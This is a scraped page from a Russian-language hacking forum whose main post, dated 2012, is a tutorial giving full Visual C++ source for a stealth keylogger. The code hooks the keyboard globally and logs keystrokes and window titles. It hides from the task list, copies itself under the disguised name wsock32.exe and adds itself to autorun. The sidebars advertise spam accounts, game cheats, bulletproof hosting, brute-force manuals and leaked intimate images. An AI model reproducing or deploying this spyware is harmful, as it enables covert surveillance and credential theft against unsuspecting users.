1. Flood v. 217
    BanDiTuK12.03.2025 в 21:23от
  2. ⚡️ куплю steam аккаунты | дам лучший прайс | 0 - 50 lvl ⚡️
    zalupator30000012.03.2025 в 21:10от
  3. ❤️ bar_cyk ❤️ – лучшие интимные архивы девушек vk (18+)
    BAR_CYK12.03.2025 в 20:37от
  4. ♚куплю ботов с скинами csgo hold/unhold ♚ работаю с 2013г.
    SUnct312.03.2025 в 20:08от
  5. ⭐steam no limit ⚡аккаунты под спам, 10lvl, оформление, часы⚡⭐
    Ashir12.03.2025 в 20:07от
  6. Профессиональная студия разработки. создаём проекты любой сложности.
    TemPoun12.03.2025 в 19:50от
  7. Проект по открытию кейсов
    colloum12.03.2025 в 19:42от
  8. [remproxy.com] *быстрые прокси под любые задачи *-20% для youhack*
    Remixsys12.03.2025 в 19:39от
  9. Читы fortnite fecurity приватный чит на фортнайт
    WizeWamter12.03.2025 в 19:34от
  10. Читы marvel rivals arcane приватный чит для marvel rivals
    WizeWamter12.03.2025 в 19:31от
  11. ✅ маркет steam аккаунтов от faker [регистрация строго на отдельном IP]
    ZigVang12.03.2025 в 19:25от
  12. ✔️ продам аккаунты ⭐ под спам ✌ от 10 lvl, оформление, часы в играх
    Flaviy12.03.2025 в 19:20от
  13. Steamaccounts.market | аккаунты под трейд и парсинг | уникальная рега
    ChinopsInt12.03.2025 в 18:52от
  14. 60% скупаю баланс стим | моментальные выплаты | trc20 | через тп steam
    arabiqq12.03.2025 в 18:51от
  15. Саморег steam | цена 1.8$ | безопасно под трейд бота | apikey | samoreg.store
    KENNAB12.03.2025 в 18:44от
  16. Кто во что катает сейчас?
    H1MERA12.03.2025 в 18:37от
  17. ✔️горячие интим архивы девушек vk 18+|тг/охота/эскорт/камеры|shtolts shop
    Рей Штольц12.03.2025 в 18:37от
  18. Разработка тг ботов
    KingTimur12.03.2025 в 18:31от
Загрузка...
  1. ⎝⭐️digiproxy⭐️ - lte, budget, resi, static, rotating, sticky proxies⎠
    932
    digiproxy
  2. Anonrdp.com | everything allowed! | 100% bulletproof server | fastflux | domains
    780
    AnonRDP
  3. Ищу ворк кс
    593
    def0lt438
  4. Купить качественный чит для fortnite | читы фортнайт
    370
    Mikhail•Khramov
  5. Купи чит фортнайт с аимботом и есп | читы fortnite
    343
    Mikhail•Khramov
  6. Next - приватный чит для dayz [ aim , wh ]
    327
    UP-GAMES
  7. Nova - купить ии аим-ассист для overwatch 2
    288
    UP-GAMES
  8. Koshar - приватный чит для rust [ wh,aim ]
    287
    UP-GAMES
  9. Stugware - приватный чит для valorant | unlock [ скины ]
    283
    UP-GAMES
  10. Аккаунты mexc без вереф до 23 года регистрации
    277
    WildThug
  11. Скупаю steam аккаунты
    253
    gnida773
  12. Steam accounts
    241
    waiting
  13. Брут мануал по стиму
    212
    www112q
  14. Куплю аккаунты bybit цена от 50$
    211
    fanta17
  15. Лучшая цена! аккаунты steam nolimit 10+lvl
    209
    Genry812
  16. Куплю аккаунты kleinanzeigen
    209
    workaccbuyer
  17. Ну, в жопе стреляет , серьезно
    192
    retirement
  18. Ищу верификацию сз (tinder, badoo)
    179
    blowflex
Загрузка...
  1. Розыгрыш дизайна #30
  2. [5$trx] серый / черный трафик обуч
  3. [5$trx] обучу лить трафик с нуля
  4. [20$ trx} от katamuami на 8 марта <3
  5. Luxhost сервер на месяц бесплатно
  6. Сервер на месяц в любой локации
  7. Luxhost free vps
  8. [6.66$ trx] от zxc proj <3 spring vibes
  9. [10$ trx] от reconnaissance <3
  10. 1 неделя в канале парсера funpay
  11. Розыгрыш 1 недели в парсере funpay для 3 человек.
  12. Розыгрыш дизайна #29
  13. 20 usdt panaiotov (4 победителя по 5 юсд)
  14. [5$trx] be a black traffic runner - i’ll teach you
  15. [5$trx] серый / черный трафик обуч
  16. [5$trx] обучу лить трафик с нуля
  17. 10$ giveaway
  18. 20$ giveaway
Загрузка...

Пример создания кейлоггера [Visual C++]

Тема в разделе "С/С++/Pascal/Delphi", создана пользователем LulzGhost, 29.07.2012.

Метки:

  1. LulzGhost

    LulzGhost

    Статус:
    Оффлайн
    Регистрация:
    03.07.12
    Сообщения:
    88
    Репутация:
    11 +/-
    Сейчас мы будем писать кейлоггер на Visual C++. В данном примере будут использоваться апшные функции, так что, можно переписать на Delphi, если кому-то захочется, то можно и на Асме:). Клавиатурный шпион у нас будет состоять из дополнительной dll и самой программы исполнительного файла(exe).
    И так, вот исходники дополнительной dll ks.dll:
    Код:
    #include «stdafx.h»
#include «ks.h»

HANDLE hmod;
HHOOK khook;
HFILE LogFile;
char LogFileName[256] = «ks.txt»;//название лог-файла
char FullLogFile[256] = «»;
char BufStr0[19] = «»;
char BufStr1[200] = «»;
char BufStr2[256] = «»;
char OldAct[1024] = «»;
LPSTR ActWin()//поца для определения активного окна
{
LPSTR ActW = new TCHAR[1024];
SendMessage(GetForegroundWindow(),WM_GETTEXT,1024,(LONG)ActW);
return ActW;
};
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{ //если лог файл по адресу c:\windir\sysdir отсутствует, то создаем его
GetSystemDirectory(FullLogFile,256);
strcat(FullLogFile,»\\»);
strcat(FullLogFile,LogFileName);
LogFile = _lopen(FullLogFile,OF_WRITE);
if (LogFile == 4294967295)
{
LogFile = _lcreat(FullLogFile,4);
};
_lclose(LogFile);
hmod = hModule;
return TRUE;
}
LRESULT CALLBACK HksKeyProc(int nCode,WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION && !(lParam & 0×80000000))
{
//если нажата клавиша, то
GetKeyNameText(lParam,BufStr0,19);
//если ламак не тыкал на кнопочки в этом приложении, то его мы пишем в лог-afqk
char *Active = ActWin();
if (strcmp(OldAct,Active) !=0)
{
strcpy(BufStr1,»\nActive Window(TITLE) «);
strcat(BufStr1,Active);
strcat(BufStr1,»\n»);
//вместе с датой и временем
char DateStr0[256] = «dd.MM.yyyy»;
char TimeStr1[256] = «hh : mm : ss»;
char DateStr1[256] = «»;
GetDateFormat(NULL,NULL,NULL,DateStr0,DateStr1,sizeof(DateStr1));
strcat(BufStr1,»[");
strcat(BufStr1,DateStr1);
strcat(BufStr1,"] «);
GetTimeFormat(NULL,TIME_FORCE24HOURFORMAT,NULL,TimeStr1,DateStr1,sizeof(DateStr1));
strcat(BufStr1,» «);
strcat(BufStr1,DateStr1);
strcat(BufStr1,» \n»);
strcat(BufStr1,»—————————————————\n»);
strcpy(OldAct,Active);
};
//пишем название нажатой клавиши
strcpy(BufStr2,» «);
strcat(BufStr1,BufStr2);
strcat(BufStr1,BufStr0);
LogFile = _lopen(FullLogFile,OF_WRITE);
_llseek(LogFile,0,FILE_END);
_lwrite(LogFile,BufStr1,lstrlen(BufStr1));
_lclose(LogFile);
strcpy(BufStr1,»");
};
return CallNextHookEx(khook,nCode,wParam,lParam);
};
//процедура для установки хука
void HksInit()
{
khook = SetWindowsHookEx(WH_KEYBOARD,
HksKeyProc,
(HINSTANCE)hmod,
NULL);

};
//процедура для закрытия хука
void HksClose()
{
UnhookWindowsHookEx(khook);
};
Теперь нужно написать ks.h:
#ifndef KS_H
#define KS_H

#include
#include

#ifdef __DLL__
#define DLL_EI __declspec(dllexport)
#else
#define DLL_EI __declspec(dllimport)
#endif
//—————————————————————————
extern «C» {
LRESULT CALLBACK DLL_EI HksKeyProc(int nCode, WPARAM wParam, LPARAM lParam);
void DLL_EI HksInit();
void DLL_EI HksClose();
};
//—————————————————————————

#endif
    Теперь создаем еще один проэкт для главного exe-шника. Кидаем в него ks.h и ks.lib (нужно его добавить в библиотеки (Alt+F7)).
    Вот листинг hks.cpp:
    Код:
    #include «stdafx.h»
#include «ks.h»
char szClassName[256] = «hKs10″;
char szAppName[256] = «hKsv10″;
typedef DWORD (WINAPI *PREGISTERSERVICEPROCESS)(DWORD,DWORD);
//проца для прятания от Ctrl+Alt+Del
bool RSP(double p1, double p2)
{
PREGISTERSERVICEPROCESS rsp;
HINSTANCE hK32;
bool Rc=false;
hK32=GetModuleHandle(«kernel32.dll»);
if(hK32!=NULL) {
rsp=(PREGISTERSERVICEPROCESS) GetProcAddress(hK32, «RegisterServiceProcess»);
if(rsp!=NULL) {
Rc=true;
rsp(p1,p2);
}
FreeLibrary(hK32);
}
return Rc;
}

LRESULT CALLBACK WndProc(HWND,UINT,WPARAM,LPARAM);
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//прячем от 3x клавиш
if(FindWindow(NULL,szAppName)) PostQuitMessage(1);
RSP(NULL,1);
//копируем ex-шник и дополнительную dll в %winsysdir%
char szValue [256] = «wsock32.exe»;
HKEY pKey;
//прописываемся в автостарте
RegCreateKey(HKEY_LOCAL_MACHINE,»Software\\Microsoft\\Windows\\CurrentVersion\\Run»,&pKey);
RegSetValueEx(pKey,»wsock32″,NULL,REG_SZ,(BYTE *)szValue,strlen(szValue)+1);
char WinDir[256] = «»;
GetSystemDirectory(WinDir,sizeof(WinDir));
strcat(WinDir,»\\»);
strcat(WinDir,szValue);
LPSTR lpFile = new TCHAR[256];
GetModuleFileName(NULL,lpFile,200);

CopyFile(lpFile,WinDir,FALSE);
GetSystemDirectory(WinDir,sizeof(WinDir));
strcat(WinDir,»\\ks.dll»);
CopyFile(«ks.dll»,WinDir,FALSE);
//пишем дату записи в файл
char BufStr1[6666] = «»;
char DateStr0[256] = «dd.MM.yyyy»;
char TimeStr1[256] = «hh : mm : ss»;
char DateStr1[256] = «»;
GetDateFormat(NULL,NULL,NULL,DateStr0,DateStr1,sizeof(DateStr1));
strcpy(BufStr1,»\n—————————————————\n»);
strcat(BufStr1,» Write to file: [");
strcat(BufStr1,DateStr1);
strcat(BufStr1,"] «);
GetTimeFormat(NULL,TIME_FORCE24HOURFORMAT,NULL,TimeStr1,DateStr1,sizeof(DateStr1));
strcat(BufStr1,» «);
strcat(BufStr1,DateStr1);
strcat(BufStr1,»\n»);

char LogFile[256]= «»;
GetSystemDirectory(LogFile,256);
strcat(LogFile,»\\ks.txt»);
HFILE Log1 = _lopen(LogFile,OF_WRITE);
_lwrite(Log1,BufStr1,lstrlen(BufStr1));
_lclose(Log1);

HksInit();

HWND hwnd;
MSG msg;
WNDCLASS wc;
wc.style = 0;
wc.lpfnWndProc = WndProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.lpszClassName = szClassName;
wc.lpszMenuName = NULL;
wc.hInstance = hInstance;
wc.hCursor = LoadCursor(NULL,IDC_ARROW);
wc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
wc.hbrBackground = (HBRUSH) COLOR_WINDOW;

RegisterClass(&wc);

hwnd = CreateWindow(szClassName,
szAppName,
WS_OVERLAPPEDWINDOW,
2,
10,
70,
100,
NULL,
NULL,
hInstance,
NULL);

ShowWindow(hwnd,SW_HIDE);
UpdateWindow(hwnd);
//обрабатываем сообщения
while (GetMessage(&msg,NULL,0,0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
switch (iMsg)
{
case WM_CREATE:return 1;break;
case WM_DESTROY:
HksClose();
PostQuitMessage(1);
break;
};

return DefWindowProc(hwnd,iMsg,wParam,lParam);
};
    Всё. Теперь это все можно запустить и прога скопирует себя B winsir\sysdir wsock32.exe и доп dll в windir\sysdir ks.dll.
    Статья взята: cyberguru.ru
     
    Последнее редактирование: 29.07.2012
    29.07.2012
    #1